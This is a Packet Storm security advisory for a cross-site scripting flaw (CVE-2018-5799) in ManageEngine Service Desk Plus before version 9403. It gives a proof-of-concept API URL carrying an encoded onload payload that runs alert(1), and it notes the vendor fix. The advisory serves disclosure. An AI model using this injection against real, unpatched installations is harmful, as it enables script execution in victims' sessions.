Lucene search

K
packetstormOkan CoskunPACKETSTORM:146922
HistoryMar 28, 2018 - 12:00 a.m.

ManageEngine Service Desk Plus Cross Site Scripting

2018-03-2800:00:00
Okan Coskun
packetstormsecurity.com
35

EPSS

0.002

Percentile

59.9%

`# Exploit Title: ManageEngine Service Desk Plus < 9403 Cross-Site Scripting  
# Vendor Homepage: https://www.manageengine.com/  
# Version: < 9403  
# CVE : CVE-2018-5799  
  
# Proof of Concept #1  
  
Visiting the following page:  
  
/api/request/?OPERATION_NAME=GET_REQUESTS">*"%3ca  
xmlns%3aa%3d'http%3a%2f%2fwww.w3.org  
<http://2fwww.w3.org>%2f1999%2fxhtml'%3e%3ca%3abody  
onload%3d'alert(1)'%2f%3e%3c%2fa%3e*  
&TECHNICIAN_KEY=E428CCCD-D5F4-4CF8-9452-76C195982BE3&INPUT_DATA=from0limit25filterbyAll_Requests  
  
will cause the execution of script.  
  
# Fixes  
  
https://www.manageengine.com/products/service-desk/readme.html  
  
issue fixed on version 9403  
  
  
`

EPSS

0.002

Percentile

59.9%

Related for PACKETSTORM:146922